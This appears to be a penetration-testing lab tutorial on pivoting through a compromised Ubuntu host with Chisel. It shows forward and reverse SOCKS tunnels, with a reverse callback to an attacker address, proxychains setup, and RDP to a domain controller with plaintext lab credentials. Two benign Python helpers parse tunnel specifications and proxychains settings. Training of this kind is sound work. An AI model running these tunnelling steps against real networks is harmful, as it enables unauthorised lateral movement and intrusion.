Chisel is a TCP/UDP-based tunneling tool written in Go that transports data over HTTP and secures it with SSH. Chisel can create a client-server tunnel connection in a firewall-restricted environment. Let us consider a scenario where we have to tunnel our traffic to a web server on the 172.16.5.0/23 network (internal network). The Domain Controller has the address 172.16.5.19. It is not directly accessible from our attack host, since our attack host and the domain controller belong to different network segments. However, since we have compromised the Ubuntu server, we can start a Chisel server on it that will listen on a specific port and forward our traffic to the internal network through the established tunnel.
Before we can use Chisel, we need to have it on our attack host. If we do not have Chisel on our attack host, we can clone the project repo using the command directly below:
git clone https://github.com/jpillora/chisel.git

We will need the programming language Go installed on our system to build the Chisel binary. With Go installed on the system, we can move into the cloned directory and use go build to build the Chisel binary.
Depending on the version of the glibc library installed on both (target and workstation) systems, there might be discrepancies that could result in an error. When this happens, it is important to compare the versions of the library on both systems, or we can use an older prebuilt version of chisel, which can be found in the Releases section of the GitHub repository.
cd chisel
go build

It can be helpful to be mindful of the size of the files we transfer onto targets on our client's networks, not just for performance reasons but also considering detection. Two beneficial resources to complement this particular concept are Oxdf's blog post "Tunneling with Chisel and SSF" and IppSec's walkthrough of the box Reddish. IppSec starts his explanation of Chisel, building the binary and shrinking the size of the binary, at the 24:29 mark of his video.
Once the binary is built, we can use SCP to transfer it to the target pivot host.
Transferring Chisel Binary to Pivot Host
scp chisel ubuntu@10.129.202.64:~/

Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5

The Chisel server will listen on port 1234 for incoming Chisel client connections and, with --socks5 enabled, expose a SOCKS5 proxy through the tunnel that forwards traffic to all the networks that are accessible from the pivot host. In our case, the pivot host has an interface on the 172.16.5.0/23 network, which will allow us to reach hosts on that network.
Connecting to the Chisel Server
./chisel client -v 10.129.202.64:1234 socks

As the client's verbose output shows, the Chisel client has created a TCP/UDP tunnel via HTTP secured using SSH between the Chisel server and the client and has started listening on port 1080. Now we can modify our proxychains.conf file located at /etc/proxychains.conf and add a socks5 entry for port 1080 at the end, so that proxychains sends our tools' traffic to local port 1080 and through the SSH tunnel.
Editing & Confirming proxychains.conf
tail -f /etc/proxychains.conf
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Pivoting to the DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Chisel Reverse Pivot
In the previous example, we used the compromised machine (Ubuntu) as our Chisel server, listening on port 1234. Still, there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option.
When the Chisel server has --reverse enabled, remotes can be prefixed with R to denote reversed. The server will listen and accept connections, and they will be proxied through the client, which specified the remote. Reverse remotes specifying R:socks will listen on the server’s default socks port (1080) and terminate the connection at the client’s internal SOCKS5 proxy.
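The remote syntax described above (a plain remote, the R: prefix, and the special socks remote) is compact enough that it is easy to misread which side listens and where the traffic exits. The following decoder is an added example written for this page, not chisel's own code; it follows the remote grammar documented in chisel's README (assumed here: `[R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/<protocol>]`, with `socks` standing in for the remote host and port, and a socks remote defaulting to 127.0.0.1:1080 on the listening side). The hostnames in the sample remotes are constructed. It turns a remote argument into a one-line description, which is also handy when a responder finds a chisel command line in a process listing and needs to record what the tunnel did.

```python
"""Decode chisel remote specifications such as 'socks', 'R:socks' or
'3000:example.com:80' into who listens where and where traffic exits.

Added example for this page; it is not chisel's own code. It follows the
remote grammar documented in chisel's README (an assumption here):

    [R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/<protocol>]

'socks' may replace <remote-host>:<remote-port> when the server runs with
--socks5; a socks remote defaults to 127.0.0.1:1080 on the listening side.
Bracketed IPv6 hosts and the 'stdio' form are deliberately not handled.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Remote:
    reverse: bool               # True when the spec carried the R: prefix
    local_host: str             # address the listening side binds
    local_port: int
    remote_host: str            # where the other side connects ("socks" = built-in proxy)
    remote_port: Optional[int]  # None for a socks remote
    protocol: str               # tcp or udp
    socks: bool

    def describe(self) -> str:
        """One-line explanation of the tunnel, e.g. for incident notes."""
        listener = "server" if self.reverse else "client"
        peer = "client" if self.reverse else "server"
        mode = "reverse" if self.reverse else "forward"
        if self.socks:
            exit_point = f"the {peer}'s built-in SOCKS5 proxy"
        else:
            exit_point = f"{self.remote_host}:{self.remote_port}/{self.protocol} via the {peer}"
        return (f"{mode}: chisel {listener} listens on {self.local_host}:{self.local_port} "
                f"and forwards each connection to {exit_point}")


def _is_port(token: str) -> bool:
    return token.isdigit() and 0 < int(token) < 65536


def parse_remote(spec: str) -> Remote:
    """Parse one remote argument as passed to 'chisel client'."""
    reverse = spec.startswith("R:")
    if reverse:
        spec = spec[2:]
    protocol = "tcp"
    if "/" in spec:
        spec, protocol = spec.rsplit("/", 1)
        if protocol not in ("tcp", "udp"):
            raise ValueError(f"unknown protocol {protocol!r}")
    parts = spec.split(":")
    if not 1 <= len(parts) <= 4 or any(p == "" for p in parts):
        raise ValueError(f"invalid remote {spec!r}")

    socks = parts[-1] == "socks"
    if socks:
        parts = parts[:-1]
    remote_host: Optional[str] = None
    remote_port: Optional[int] = None
    local_host: Optional[str] = None
    local_port: Optional[int] = None

    # Walk right to left, as chisel does: the first port/host seen fills the
    # remote side (unless this is a socks remote); later ones fill the local side.
    for token in reversed(parts):
        if _is_port(token):
            if not socks and remote_port is None:
                remote_port = int(token)
            local_port = int(token)
        else:
            if not socks and remote_port is None:
                raise ValueError(f"missing port in {spec!r}")
            if not socks and remote_host is None:
                remote_host = token
            else:
                local_host = token

    if socks:
        return Remote(reverse, local_host or "127.0.0.1", local_port or 1080,
                      "socks", None, protocol, True)
    if remote_port is None:
        raise ValueError(f"missing port in {spec!r}")
    return Remote(reverse, local_host or "0.0.0.0", local_port or remote_port,
                  remote_host or "0.0.0.0", remote_port, protocol, False)


def describe_all(specs: List[str]) -> List[str]:
    """Describe several remotes at once, e.g. all arguments of one client command line."""
    return [parse_remote(s).describe() for s in specs]


if __name__ == "__main__":
    # The two remotes used on this page plus a constructed plain port-forward for contrast.
    for line in describe_all(["socks", "R:socks", "3000:example.com:80"]):
        print(line)
```

For `R:socks` the decoder reports that the server listens on 127.0.0.1:1080 and hands each connection to the client's built-in SOCKS5 proxy, which is exactly the behaviour the paragraph above describes; for a forward `socks` remote the roles swap and the client is the one listening on 1080.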
Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5

Then we connect from the Ubuntu (pivot host) to our attack host, using the option R:socks.
Connecting the Chisel Client to our Attack Host
./chisel client -v 10.10.14.17:1234 R:socks

tail -f /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Note: If you are getting an error message with chisel on the target, try with a different version.
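Both pivots above end with the same step: confirming that the [ProxyList] in /etc/proxychains.conf carries an active socks5 entry for 127.0.0.1:1080 and nothing stale in front of it. The following checker is an added example written for this page, not proxychains' or chisel's code. It implements only the subset of the file format shown on the page (comment lines starting with '#', entries of the form `<type> <host> <port> [<user> <password>]`, proxy types http, socks4 and socks5); the two sample configurations embedded in it are constructed, the first mirroring the page's listing and the second showing the common slip of leaving the tor default uncommented.

```python
"""Parse the [ProxyList] section of a proxychains.conf and confirm it points
at the chisel SOCKS listener on 127.0.0.1:1080.

Added example for this page; it is not proxychains' or chisel's code. It
implements the subset of the format shown on the page: comment lines start
with '#', entries are '<type> <host> <port> [<user> <password>]', and the
proxy types are http, socks4 and socks5.
"""
from typing import List, NamedTuple


class ProxyEntry(NamedTuple):
    kind: str        # http, socks4 or socks5
    host: str
    port: int
    user: str = ""
    password: str = ""


PROXY_TYPES = ("http", "socks4", "socks5")


def parse_proxy_list(text: str) -> List[ProxyEntry]:
    """Return the active (uncommented) entries under [ProxyList], in file order."""
    entries: List[ProxyEntry] = []
    in_list = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            in_list = line.lower() == "[proxylist]"
            continue                      # section header
        if not in_list:
            continue                      # options such as strict_chain live above the list
        fields = line.split()
        if len(fields) not in (3, 5) or fields[0] not in PROXY_TYPES:
            raise ValueError(f"malformed ProxyList entry: {raw!r}")
        if not fields[2].isdigit() or not 0 < int(fields[2]) < 65536:
            raise ValueError(f"bad port in ProxyList entry: {raw!r}")
        entries.append(ProxyEntry(fields[0], fields[1], int(fields[2]), *fields[3:]))
    return entries


def check_tunnel_entry(entries: List[ProxyEntry], host: str = "127.0.0.1",
                       port: int = 1080) -> List[str]:
    """Findings that would stop proxychains from using the chisel tunnel; empty means OK."""
    findings: List[str] = []
    if not entries:
        findings.append("ProxyList has no active entries")
        return findings
    if not any(e.kind == "socks5" and e.host == host and e.port == port for e in entries):
        findings.append(f"no socks5 entry for {host}:{port}")
    for e in entries:
        if e.port == 9050:
            findings.append(f"default tor entry {e.kind} {e.host}:{e.port} is still active; "
                            "under strict_chain every connection is routed through it first")
    return findings


# Constructed sample: the tail of /etc/proxychains.conf as edited on the page.
SAMPLE_OK = """\
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
"""

# Constructed sample of a common slip: the tor default was left uncommented.
SAMPLE_STALE = """\
[ProxyList]
socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
"""

if __name__ == "__main__":
    for name, text in (("ok", SAMPLE_OK), ("stale", SAMPLE_STALE)):
        entries = parse_proxy_list(text)
        print(name, entries, check_tunnel_entry(entries) or "matches the tunnel")
```

Running the checker over the real file (`check_tunnel_entry(parse_proxy_list(open("/etc/proxychains.conf").read()))`) before launching a proxychains command catches the two failure modes that produce confusing timeouts: the 1080 entry never being added, and a leftover 9050 entry that strict_chain would try first.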